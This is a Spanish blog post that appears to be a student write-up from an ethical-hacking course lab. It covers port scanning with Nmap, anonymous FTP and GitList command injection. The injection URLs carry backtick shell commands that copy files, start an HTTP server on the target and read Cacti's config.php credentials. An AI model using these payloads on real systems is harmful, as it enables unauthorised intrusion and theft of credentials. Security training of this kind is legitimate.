viernes, 23 de octubre de 2015

Paso para encontrar una vulnerabilidad y explotarla. Mooc Hacking ético Mondragon

Lo primero que hay que hacer es un análisis de puertos para detectar puertos abiertos.

esto se realiza utilizando las herramientas Nmap o zenmap
Namp
Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-10-06 09:10 AST
Nmap scan report for 188.166.94.208
Host is up (0.030s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
80/tcp open http
82/tcp filtered xfer
89/tcp filtered su-mit-tg
125/tcp filtered locus-map
146/tcp filtered iso-tp0
444/tcp filtered snpp
497/tcp filtered retrospect
667/tcp filtered disclose
668/tcp filtered mecomm
888/tcp filtered accessbuilder
900/tcp filtered omginitialrefs
902/tcp filtered iss-realsecure
1002/tcp filtered windows-icfw
Nmap: the Network Mapper - Free Security Scanner
Nmap Free Security Scanner, Port Scanner, & Network Exploration Tool. Download open source software for Linux, Windows, UNIX, FreeBSD, etc.
nmap.org
Nmap Free Security Scanner, Port Scanner, & Network Exploration Tool. Download open source software for Linux, Windows, UNIX, FreeBSD, etc.
Luego un análisis de vulnerabilidades utilizando herramientas existentes como Nessus o explorando en internet sobre las versiones de los sistemas instalados sus vulnerabilidades y explotaciones

Scan con Nessus
luego de encontrar las vulnerabilidades y puertos abiertos se procede a verificar desde lo más fácil a lo más dificil con la intención de ganar tiempo

Para descargar documento #1

Simple ftp anonimo 
ftp://188.166.94.208/
Par descargar el documento #2
se utilizó una vulnerabilidad encontrada en gitlist la cual resolvimos actualizando el sistema.

 Proceso de descarga:
http://188.166.102.65/gitlist/gitlist/blame/master/""`ls /usr/share/doc/base-files/`
http://188.166.102.65/gitlist/gitlist/blame/master/""`cp /usr/share/doc/base-files/mooc-hacking-team-0051-level-01.gpg /var/www/gitlist/cache`
http://188.166.102.65/gitlist/gitlist/blame/master/""`cd /var/www/gitlist/cache && python -m SimpleHTTPServer 8000`
http://188.166.102.65:8000 y descargar archivo


Documento #3 

Este documento no lo pudimos descargar ya que no teníamos permisos para hacer pero si identificamos que era a travez de la aplicación cacti que se debe realizar asi que buscamos las contrasena en los servidores que pudimos e identificamos que todos teníamos la misma.
proceso
clave de cacti
http://188.166.102.65/gitlist/gitlist/blame/master/””`cat /usr/share/cacti/site/include/config.php`
Publicadas por a la/s

No hay comentarios.:

Publicar un comentario

Suscribirse a: Comentarios de la entrada (Atom)